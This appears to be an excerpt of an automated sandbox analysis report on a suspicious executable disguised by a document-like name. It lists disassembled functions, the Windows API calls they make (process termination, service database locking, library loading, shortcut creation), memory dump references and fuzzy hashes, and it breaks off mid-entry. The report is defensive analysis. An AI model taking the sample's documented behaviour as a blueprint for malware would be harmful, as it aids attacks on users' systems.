                                                                                                                                    Function 0044B64F Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                                                    • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                                                      • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                                                    • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                                                    • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3495660284-0
                                                                                                                                    • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                    • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                                                                    • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                                    • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                                                                    Function 00437118 Relevance: 9.0, APIs: 6, Instructions: 37windowtimethreadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                    • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                    • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                                                                    • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                                    • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                                                                    Function 0043604B Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\Doc 784-01965670.exe,00000004), ref: 00436055
                                                                                                                                    • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                                                    • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                                                                    • GetLastError.KERNEL32 ref: 00436081
                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1690418490-0
                                                                                                                                    • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                                    • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                                                                    • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                                    • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                                                                    Function 00475ACA Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                                                                    • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                                                                    • CoUninitialize.OLE32 ref: 00475D71
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                    • String ID: .lnk$HH
                                                                                                                                    • API String ID: 886957087-3121654589
                                                                                                                                    • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                                    • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                                                                                    • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                                    • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                                                                                    Function 0045F132 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1173514356-4108050209
                                                                                                                                    • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                                    • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                                                                                    • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                                    • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                                                                                    Function 004692E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                                                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$_wcslen
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 763830540-1403004172
                                                                                                                                    • Opcode ID: 61f9ca9c5a419efdf5b0fec418701a37d71c48c53c791e94f016d44e45ec48a7
                                                                                                                                    • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                                                                    • Opcode Fuzzy Hash: 61f9ca9c5a419efdf5b0fec418701a37d71c48c53c791e94f016d44e45ec48a7
                                                                                                                                    • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                                                                    Function 00443981 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                                                                      • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                                      • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                                      • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentHandleProcess$Duplicate
                                                                                                                                    • String ID: nul
                                                                                                                                    • API String ID: 2124370227-2873401336
                                                                                                                                    • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                                    • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                                                                    • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                                    • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                                                                    Function 00443887 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                                                                      • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                                      • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                                      • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentHandleProcess$Duplicate
                                                                                                                                    • String ID: nul
                                                                                                                                    • API String ID: 2124370227-2873401336
                                                                                                                                    • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                                    • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                                                                    • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                                                                    • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                                                                    Function 004412AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowlibraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                                    • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                    • API String ID: 3529120543-1011021900
                                                                                                                                    • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                                    • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                                                                    • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                                                                    • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                                                                    Function 00443009 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                                                    • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Peek$DispatchTranslate
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 1795658109-438819550
                                                                                                                                    • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                                    • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                                                                    • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                                    • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                                                                    Function 004609BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                      • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                                      • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                                      • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                                      • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                                    • GetFocus.USER32 ref: 004609EF
                                                                                                                                      • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                                                                      • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                                                                    • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                                                                    • __swprintf.LIBCMT ref: 00460A7A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                                                                    • String ID: %s%d
                                                                                                                                    • API String ID: 991886796-1110647743
                                                                                                                                    • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                                    • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                                                                    • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                                    • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                                                                    Function 0040F790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$_sprintf
                                                                                                                                    • String ID: %02X
                                                                                                                                    • API String ID: 891462717-436463671
                                                                                                                                    • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                                    • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                                                                                    • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                                    • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                                                                                    Function 0040F3B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0042CD00
                                                                                                                                    • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Doc 784-01965670.exe,?,C:\Users\user\Desktop\Doc 784-01965670.exe,004A8E80,C:\Users\user\Desktop\Doc 784-01965670.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                      • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                                      • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                                      • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                                                                      • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                                      • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                                                                      • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                                    • String ID: $OH$@OH$X
                                                                                                                                    • API String ID: 3491138722-1394974532
                                                                                                                                    • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                    • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
